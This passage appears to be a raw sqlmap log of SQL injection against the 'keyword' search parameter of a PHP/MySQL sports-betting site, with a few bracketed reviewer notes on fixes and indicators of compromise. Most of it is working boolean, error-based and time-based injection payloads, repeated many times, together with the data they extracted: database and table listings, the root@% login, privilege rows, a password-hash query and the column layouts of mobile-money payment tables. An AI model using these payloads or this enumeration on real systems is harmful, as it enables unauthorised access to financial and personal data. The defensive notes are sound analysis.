  693. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  694. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  695.  
  696. Type: AND/OR time-based blind
  697. Title: MySQL > 5.0.11 AND time-based blind
  698. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  699. ---
  700. web application technology: PHP 5.6.33, Nginx
  701. back-end DBMS: MySQL 5.0
  702. available databases [5]:
  703. [*] biko_sport
  704. [*] information_schema
  705. [*] mysql
  706. [*] performance_schema
  707. [*] sys
  708.  
  709. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  710. ---
  711. Place: POST
  712. Parameter: keyword
  713. Type: boolean-based blind
  714. Title: AND boolean-based blind - WHERE or HAVING clause
  715. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  716.  
  717. Type: error-based
  718. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  719. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  720.  
  721. Type: AND/OR time-based blind
  722. Title: MySQL > 5.0.11 AND time-based blind
  723. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  724. ---
  725. web application technology: PHP 5.6.33, Nginx
  726. back-end DBMS: MySQL 5.0
  727. Database: sys
  728. [101 tables]
  729. +-----------------------------------------------+
  730. | session |
  731. | version |
  732. | host_summary |
  733. | host_summary_by_file_io |
  734. | host_summary_by_file_io_type |
  735. | host_summary_by_stages |
  736. | host_summary_by_statement_latency |
  737. | host_summary_by_statement_type |
  738. | innodb_buffer_stats_by_schema |
  739. | innodb_buffer_stats_by_table |
  740. | innodb_lock_waits |
  741. | io_by_thread_by_latency |
  742. | io_global_by_file_by_bytes |
  743. | io_global_by_file_by_latency |
  744. | io_global_by_wait_by_bytes |
  745. | io_global_by_wait_by_latency |
  746. | latest_file_io |
  747. | memory_by_host_by_current_bytes |
  748. | memory_by_thread_by_current_bytes |
  749. | memory_by_user_by_current_bytes |
  750. | memory_global_by_current_bytes |
  751. | memory_global_total |
  752. | metrics |
  753. | processlist |
  754. | ps_check_lost_instrumentation |
  755. | schema_auto_increment_columns |
  756. | schema_index_statistics |
  757. | schema_object_overview |
  758. | schema_redundant_indexes |
  759. | schema_table_lock_waits |
  760. | schema_table_statistics |
  761. | schema_table_statistics_with_buffer |
  762. | schema_tables_with_full_table_scans |
  763. | schema_unused_indexes |
  764. | session_ssl_status |
  765. | statement_analysis |
  766. | statements_with_errors_or_warnings |
  767. | statements_with_full_table_scans |
  768. | statements_with_runtimes_in_95th_percentile |
  769. | statements_with_sorting |
  770. | statements_with_temp_tables |
  771. | sys_config |
  772. | user_summary |
  773. | user_summary_by_file_io |
  774. | user_summary_by_file_io_type |
  775. | user_summary_by_stages |
  776. | user_summary_by_statement_latency |
  777. | user_summary_by_statement_type |
  778. | wait_classes_global_by_avg_latency |
  779. | wait_classes_global_by_latency |
  780. | waits_by_host_by_latency |
  781. | waits_by_user_by_latency |
  782. | waits_global_by_latency |
  783. | x$host_summary |
  784. | x$host_summary_by_file_io |
  785. | x$host_summary_by_file_io_type |
  786. | x$host_summary_by_stages |
  787. | x$host_summary_by_statement_latency |
  788. | x$host_summary_by_statement_type |
  789. | x$innodb_buffer_stats_by_schema |
  790. | x$innodb_buffer_stats_by_table |
  791. | x$innodb_lock_waits |
  792. | x$io_by_thread_by_latency |
  793. | x$io_global_by_file_by_bytes |
  794. | x$io_global_by_file_by_latency |
  795. | x$io_global_by_wait_by_bytes |
  796. | x$io_global_by_wait_by_latency |
  797. | x$latest_file_io |
  798. | x$memory_by_host_by_current_bytes |
  799. | x$memory_by_thread_by_current_bytes |
  800. | x$memory_by_user_by_current_bytes |
  801. | x$memory_global_by_current_bytes |
  802. | x$memory_global_total |
  803. | x$processlist |
  804. | x$ps_digest_95th_percentile_by_avg_us |
  805. | x$ps_digest_avg_latency_distribution |
  806. | x$ps_schema_table_statistics_io |
  807. | x$schema_flattened_keys |
  808. | x$schema_index_statistics |
  809. | x$schema_table_lock_waits |
  810. | x$schema_table_statistics |
  811. | x$schema_table_statistics_with_buffer |
  812. | x$schema_tables_with_full_table_scans |
  813. | x$session |
  814. | x$statement_analysis |
  815. | x$statements_with_errors_or_warnings |
  816. | x$statements_with_full_table_scans |
  817. | x$statements_with_runtimes_in_95th_percentile |
  818. | x$statements_with_sorting |
  819. | x$statements_with_temp_tables |
  820. | x$user_summary |
  821. | x$user_summary_by_file_io |
  822. | x$user_summary_by_file_io_type |
  823. | x$user_summary_by_stages |
  824. | x$user_summary_by_statement_latency |
  825. | x$user_summary_by_statement_type |
  826. | x$wait_classes_global_by_avg_latency |
  827. | x$wait_classes_global_by_latency |
  828. | x$waits_by_host_by_latency |
  829. | x$waits_by_user_by_latency |
  830. | x$waits_global_by_latency |
  831. +-----------------------------------------------+
  832.  
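  [Reviewer note: every block in this log repeats one finding. The POST parameter `keyword` reaches a MySQL WHERE/HAVING clause without being bound as a parameter, and the quote-and-percent framing of the payloads suggests it is concatenated into a LIKE pattern. "a total of 0 HTTP(s) requests" means the detection result was reused from sqlmap's stored session, so these counts understate the traffic the server actually received. The application-side fix is a parameterized query with the wildcards added to the bound value. Input filtering alone is not a fix.]
  833. sqlmap identified the following injection points with a total of 0 HTTP(s) requests: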
  834. ---
  835. Place: POST
  836. Parameter: keyword
  837. Type: boolean-based blind
  838. Title: AND boolean-based blind - WHERE or HAVING clause
  839. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  840.  
  841. Type: error-based
  842. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  843. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  844.  
  845. Type: AND/OR time-based blind
  846. Title: MySQL > 5.0.11 AND time-based blind
  847. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  848. ---
  849. web application technology: PHP 5.6.33, Nginx
  850. back-end DBMS: MySQL 5.0
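  851. current user: 'root@%'
  852. current user is DBA: False
  [Reviewer note: the web application connects to MySQL as `root` with a wildcard host (`%`), so an injection in a single search field reaches every schema on the server, consistent with the `mysql` and `sys` listings elsewhere in this log. The application should use a dedicated account granted only the privileges it needs on its own schema and restricted to the application server's host. "current user is DBA: False" conflicts with a root login and is probably a failed privilege lookup rather than a real restriction. Confirm the grants on the server.]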
  853. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  854. ---
  855. Place: POST
  856. Parameter: keyword
  857. Type: boolean-based blind
  858. Title: AND boolean-based blind - WHERE or HAVING clause
  859. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  860.  
  861. Type: error-based
  862. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  863. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  864.  
  865. Type: AND/OR time-based blind
  866. Title: MySQL > 5.0.11 AND time-based blind
  867. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  868. ---
  869. web application technology: PHP 5.6.33, Nginx
  870. back-end DBMS: MySQL 5.0
  871. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  872. ---
  873. Place: POST
  874. Parameter: keyword
  875. Type: boolean-based blind
  876. Title: AND boolean-based blind - WHERE or HAVING clause
  877. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  878.  
  879. Type: error-based
  880. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  881. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  882.  
  883. Type: AND/OR time-based blind
  884. Title: MySQL > 5.0.11 AND time-based blind
  885. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  886. ---
  887. web application technology: PHP 5.6.33, Nginx
  888. back-end DBMS: MySQL 5.0
  889. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  890. ---
  891. Place: POST
  892. Parameter: keyword
  893. Type: boolean-based blind
  894. Title: AND boolean-based blind - WHERE or HAVING clause
  895. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  896.  
  897. Type: error-based
  898. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  899. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  900.  
  901. Type: AND/OR time-based blind
  902. Title: MySQL > 5.0.11 AND time-based blind
  903. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  904. ---
  905. web application technology: PHP 5.6.33, Nginx
  906. back-end DBMS: MySQL 5.0
  907. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  908. ---
  909. Place: POST
  910. Parameter: keyword
  911. Type: boolean-based blind
  912. Title: AND boolean-based blind - WHERE or HAVING clause
  913. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  914.  
  915. Type: error-based
  916. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  917. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  918.  
  919. Type: AND/OR time-based blind
  920. Title: MySQL > 5.0.11 AND time-based blind
  921. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  922. ---
  923. web application technology: PHP 5.6.33, Nginx
  924. back-end DBMS: MySQL 5.0
  925. available databases [5]:
  926. [*] biko_sport
  927. [*] information_schema
  928. [*] mysql
  929. [*] performance_schema
  930. [*] sys
  931.  
  932. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  933. ---
  934. Place: POST
  935. Parameter: keyword
  936. Type: boolean-based blind
  937. Title: AND boolean-based blind - WHERE or HAVING clause
  938. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  939.  
  940. Type: error-based
  941. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  942. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  943.  
  944. Type: AND/OR time-based blind
  945. Title: MySQL > 5.0.11 AND time-based blind
  946. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  947. ---
  948. web application technology: PHP 5.6.33, Nginx
  949. back-end DBMS: MySQL 5.0
  950. Database: mysql
  951. [33 tables]
  952. +---------------------------+
  953. | system_user |
  954. | user |
  955. | columns_priv |
  956. | db |
  957. | engine_cost |
  958. | event |
  959. | func |
  960. | general_log |
  961. | gtid_executed |
  962. | heartbeat |
  963. | help_category |
  964. | help_keyword |
  965. | help_relation |
  966. | help_topic |
  967. | innodb_index_stats |
  968. | innodb_table_stats |
  969. | ndb_binlog_index |
  970. | plugin |
  971. | proc |
  972. | procs_priv |
  973. | proxies_priv |
  974. | server_cost |
  975. | servers |
  976. | slave_master_info |
  977. | slave_relay_log_info |
  978. | slave_worker_info |
  979. | slow_log |
  980. | tables_priv |
  981. | time_zone |
  982. | time_zone_leap_second |
  983. | time_zone_name |
  984. | time_zone_transition |
  985. | time_zone_transition_type |
  986. +---------------------------+
  987.  
  988. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  989. ---
  990. Place: POST
  991. Parameter: keyword
  992. Type: boolean-based blind
  993. Title: AND boolean-based blind - WHERE or HAVING clause
  994. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  995.  
  996. Type: error-based
  997. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  998. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  999.  
  1000. Type: AND/OR time-based blind
  1001. Title: MySQL > 5.0.11 AND time-based blind
  1002. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1003. ---
  1004. web application technology: PHP 5.6.33, Nginx
  1005. back-end DBMS: MySQL 5.0
  1006. Database: mysql
  1007. Table: db
  1008. [1 entry]
  1009. +-----+-----------+-----------+-----------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+----------------+-----------------+------------------+------------------+--------------------+---------------------+-----------------------+
  1010. | Db | Host | `User` | Drop_priv | Grant_priv | Alter_priv | Index_priv | Event_priv | Create_priv | Insert_priv | Select_priv | Update_priv | Delete_priv | Execute_priv | Trigger_priv | Show_view_priv | References_priv | Create_view_priv | Lock_tables_priv | Alter_routine_priv | Create_routine_priv | Create_tmp_table_priv |
  1011. +-----+-----------+-----------+-----------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+----------------+-----------------+------------------+------------------+--------------------+---------------------+-----------------------+
  1012. | sys | localhost | mysql.sys | N | N | N | N | N | N | N | N | N | N | N | Y | N | N | N | N | N | N | N |
  1013. +-----+-----------+-----------+-----------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+----------------+-----------------+------------------+------------------+--------------------+---------------------+-----------------------+
  1014.  
  1015. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1016. ---
  1017. Place: POST
  1018. Parameter: keyword
  1019. Type: boolean-based blind
  1020. Title: AND boolean-based blind - WHERE or HAVING clause
  1021. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1022.  
  1023. Type: error-based
  1024. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1025. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1026.  
  1027. Type: AND/OR time-based blind
  1028. Title: MySQL > 5.0.11 AND time-based blind
  1029. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1030. ---
  1031. web application technology: PHP 5.6.33, Nginx
  1032. back-end DBMS: MySQL 5.0
  1033. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1034. ---
  1035. Place: POST
  1036. Parameter: keyword
  1037. Type: boolean-based blind
  1038. Title: AND boolean-based blind - WHERE or HAVING clause
  1039. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1040.  
  1041. Type: error-based
  1042. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1043. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1044.  
  1045. Type: AND/OR time-based blind
  1046. Title: MySQL > 5.0.11 AND time-based blind
  1047. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1048. ---
  1049. web application technology: PHP 5.6.33, Nginx
  1050. back-end DBMS: MySQL 5.0
  1051. available databases [5]:
  1052. [*] biko_sport
  1053. [*] information_schema
  1054. [*] mysql
  1055. [*] performance_schema
  1056. [*] sys
  1057.  
  1058. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1059. ---
  1060. Place: POST
  1061. Parameter: keyword
  1062. Type: boolean-based blind
  1063. Title: AND boolean-based blind - WHERE or HAVING clause
  1064. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1065.  
  1066. Type: error-based
  1067. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1068. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1069.  
  1070. Type: AND/OR time-based blind
  1071. Title: MySQL > 5.0.11 AND time-based blind
  1072. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1073. ---
  1074. web application technology: PHP 5.6.33, Nginx
  1075. back-end DBMS: MySQL 5.0
  1076. current user: 'root@%'
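  1077. database management system users password hashes:
  1078. [*] mysql.sys [1]:
  1079. password hash: NULL
  1080. [*] root [1]:
  1081. password hash: NULL
  [Reviewer note: `NULL` here should not be read as "these accounts have no password". On MySQL 5.7 and later the hash is stored in `mysql.user.authentication_string` and the older `Password` column no longer exists, so a tool that queries the old column gets nothing back. That is presumably what happened here. Check the account state on the server directly, and treat the credentials as exposed either way.]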
  1082.  
  1083. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1084. ---
  1085. Place: POST
  1086. Parameter: keyword
  1087. Type: boolean-based blind
  1088. Title: AND boolean-based blind - WHERE or HAVING clause
  1089. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1090.  
  1091. Type: error-based
  1092. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1093. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1094.  
  1095. Type: AND/OR time-based blind
  1096. Title: MySQL > 5.0.11 AND time-based blind
  1097. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1098. ---
  1099. web application technology: PHP 5.6.33, Nginx
  1100. back-end DBMS: MySQL 5.0
  1101. Database: biko_sport
  1102. [151 tables]
  1103. +--------------------------+
  1104. | SEQUENCE |
  1105. | match |
  1106. | transaction |
  1107. | user |
  1108. | account_freeze |
  1109. | airtel_money |
  1110. | airtel_money_rate |
  1111. | airtel_subs_blast |
  1112. | arch_live_match |
  1113. | auth_assignment |
  1114. | auth_item |
  1115. | auth_item_child |
  1116. | auth_rule |
  1117. | backup_profile |
  1118. | bb |
  1119. | bet |
  1120. | bet_discount |
  1121. | bet_slip |
  1122. | bet_slip_check |
  1123. | bet_slip_temp |
  1124. | bet_status_changes |
  1125. | biko_point |
  1126. | biko_point_bet |
  1127. | biko_point_summary |
  1128. | biko_point_trx |
  1129. | biko_profile_names |
  1130. | bleague_competition |
  1131. | bleague_event_odd |
  1132. | bleague_match |
  1133. | bonus_bet |
  1134. | bonus_bet_count |
  1135. | bonus_trx |
  1136. | card_summary |
  1137. | category |
  1138. | competition |
  1139. | delivery_report |
  1140. | early_bet_white_list |
  1141. | event |
  1142. | event_odd |
  1143. | free_bet |
  1144. | free_bet_transactions |
  1145. | ga |
  1146. | game |
  1147. | game_ids |
  1148. | game_request |
  1149. | gr_profile_player |
  1150. | gr_tickets |
  1151. | inactive2_subs |
  1152. | inactive_nums |
  1153. | inactive_profile |
  1154. | inbox |
  1155. | jackpot_bet |
  1156. | jackpot_event |
  1157. | jackpot_match |
  1158. | jackpot_trx |
  1159. | jackpot_type |
  1160. | jackpot_winner |
  1161. | jp_bet_cancel_data |
  1162. | jpbonus_award |
  1163. | latest_alive |
  1164. | live_match |
  1165. | live_meta_history |
  1166. | live_odds |
  1167. | live_odds_change |
  1168. | live_odds_meta |
  1169. | ls_betmatch |
  1170. | ls_card |
  1171. | ls_category |
  1172. | ls_city |
  1173. | ls_country |
  1174. | ls_goal |
  1175. | ls_line_up |
  1176. | ls_livescore_data |
  1177. | ls_match_detail |
  1178. | ls_player |
  1179. | ls_referee |
  1180. | ls_scores |
  1181. | ls_sport |
  1182. | ls_substitution |
  1183. | ls_team |
  1184. | ls_tournament |
  1185. | ls_venue |
  1186. | matchid |
  1187. | menu |
  1188. | migration |
  1189. | missed_withdrawals |
  1190. | mobile_app_profile |
  1191. | mobile_app_version |
  1192. | mpesa_rate |
  1193. | mpesa_transaction |
  1194. | msi |
  1195. | mts_exception |
  1196. | mts_ticket_submit |
  1197. | mts_validation_code |
  1198. | network_charge_range |
  1199. | nums_pro |
  1200. | odd_history |
  1201. | odd_key_alias |
  1202. | odd_type |
  1203. | odds_history |
  1204. | odds_subtype |
  1205. | outbox |
  1206. | outcome |
  1207. | outcome_backup |
  1208. | outcome_o |
  1209. | outcome_old |
  1210. | outcome_test |
  1211. | outright |
  1212. | outright_competitor |
  1213. | outright_odd |
  1214. | outright_odd_history |
  1215. | outright_outcome |
  1216. | paybill_tariff |
  1217. | playground |
  1218. | profile |
  1219. | profile_balance |
  1220. | profile_bonus |
  1221. | profile_setting |
  1222. | profile_settings |
  1223. | recon_references |
  1224. | reconciliation |
  1225. | running_balance |
  1226. | seven_aggregator_request |
  1227. | shop_deposits |
  1228. | shop_withdrawals |
  1229. | speed_dial_history |
  1230. | speed_dial_profile |
  1231. | sport |
  1232. | sqlmapfile |
  1233. | talksport |
  1234. | team |
  1235. | ticket_settlement |
  1236. | tournament |
  1237. | traffic_analytic |
  1238. | types |
  1239. | user_bet_cancel |
  1240. | ux_categories |
  1241. | ux_todays_highlights |
  1242. | virtual_competition |
  1243. | virtual_event_odd |
  1244. | virtual_latest_alive |
  1245. | virtual_match |
  1246. | virtual_odd_type |
  1247. | virtual_odds |
  1248. | virtual_odds_meta |
  1249. | virtual_outcome |
  1250. | virtual_sport |
  1251. | void_bet_slip |
  1252. | winner |
  1253. | withdraw_references |
  1254. | withdrawal |
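  1255. +--------------------------+
  [Reviewer note: `sqlmapfile` in the list above does not look like an application table. It matches the default name of the support table sqlmap creates when its file-system access features are used, which suggests the tool was able to create objects in this schema. Defenders can search all schemas for this name (and for `sqlmapoutput`) as an indicator of prior sqlmap activity, and should treat a hit as evidence of write access, not only read access.]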
  1256.  
  1257. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1258. ---
  1259. Place: POST
  1260. Parameter: keyword
  1261. Type: boolean-based blind
  1262. Title: AND boolean-based blind - WHERE or HAVING clause
  1263. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1264.  
  1265. Type: error-based
  1266. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1267. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1268.  
  1269. Type: AND/OR time-based blind
  1270. Title: MySQL > 5.0.11 AND time-based blind
  1271. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1272. ---
  1273. web application technology: PHP 5.6.33, Nginx
  1274. back-end DBMS: MySQL 5.0
  1275. Database: biko_sport
  1276. Table: airtel_money
  1277. [10 columns]
  1278. +-------------------+---------------+
  1279. | Column | Type |
  1280. +-------------------+---------------+
  1281. | account_no | varchar(100) |
  1282. | airtel_money_code | varchar(50) |
  1283. | amount | decimal(10,2) |
  1284. | created | datetime |
  1285. | first_name | varchar(120) |
  1286. | id | bigint(20) |
  1287. | last_name | varchar(120) |
  1288. | modified | timestamp |
  1289. | msisdn | varchar(30) |
  1290. | time_stamp | datetime |
  1291. +-------------------+---------------+
  1292.  
  1293. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1294. ---
  1295. Place: POST
  1296. Parameter: keyword
  1297. Type: boolean-based blind
  1298. Title: AND boolean-based blind - WHERE or HAVING clause
  1299. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1300.  
  1301. Type: error-based
  1302. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1303. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1304.  
  1305. Type: AND/OR time-based blind
  1306. Title: MySQL > 5.0.11 AND time-based blind
  1307. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1308. ---
  1309. web application technology: PHP 5.6.33, Nginx
  1310. back-end DBMS: MySQL 5.0
  1311. Database: biko_sport
  1312. Table: airtel_money
  1313. [0 entries]
  1314. +----+--------+--------+---------+----------+-----------+------------+------------+------------+-------------------+
  1315. | id | msisdn | amount | created | modified | last_name | first_name | time_stamp | account_no | airtel_money_code |
  1316. +----+--------+--------+---------+----------+-----------+------------+------------+------------+-------------------+
  1317. +----+--------+--------+---------+----------+-----------+------------+------------+------------+-------------------+
  1318.  
  1319. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1320. ---
  1321. Place: POST
  1322. Parameter: keyword
  1323. Type: boolean-based blind
  1324. Title: AND boolean-based blind - WHERE or HAVING clause
  1325. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1326.  
  1327. Type: error-based
  1328. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1329. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1330.  
  1331. Type: AND/OR time-based blind
  1332. Title: MySQL > 5.0.11 AND time-based blind
  1333. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1334. ---
  1335. web application technology: PHP 5.6.33, Nginx
  1336. back-end DBMS: MySQL 5.0
  1337. Database: biko_sport
  1338. Table: SEQUENCE
  1339. [2 columns]
  1340. +-----------+---------------+
  1341. | Column | Type |
  1342. +-----------+---------------+
  1343. | SEQ_COUNT | decimal(38,0) |
  1344. | SEQ_NAME | varchar(50) |
  1345. +-----------+---------------+
  1346.  
  1347. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1348. ---
  1349. Place: POST
  1350. Parameter: keyword
  1351. Type: boolean-based blind
  1352. Title: AND boolean-based blind - WHERE or HAVING clause
  1353. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1354.  
  1355. Type: error-based
  1356. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1357. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1358.  
  1359. Type: AND/OR time-based blind
  1360. Title: MySQL > 5.0.11 AND time-based blind
  1361. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1362. ---
  1363. web application technology: PHP 5.6.33, Nginx
  1364. back-end DBMS: MySQL 5.0
  1365. Database: biko_sport
  1366. Table: SEQUENCE
  1367. [0 entries]
  1368. +----------+-----------+
  1369. | SEQ_NAME | SEQ_COUNT |
  1370. +----------+-----------+
  1371. +----------+-----------+
  1372.  
  1373. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1374. ---
  1375. Place: POST
  1376. Parameter: keyword
  1377. Type: boolean-based blind
  1378. Title: AND boolean-based blind - WHERE or HAVING clause
  1379. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1380.  
  1381. Type: error-based
  1382. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1383. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1384.  
  1385. Type: AND/OR time-based blind
  1386. Title: MySQL > 5.0.11 AND time-based blind
  1387. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1388. ---
  1389. web application technology: PHP 5.6.33, Nginx
  1390. back-end DBMS: MySQL 5.0
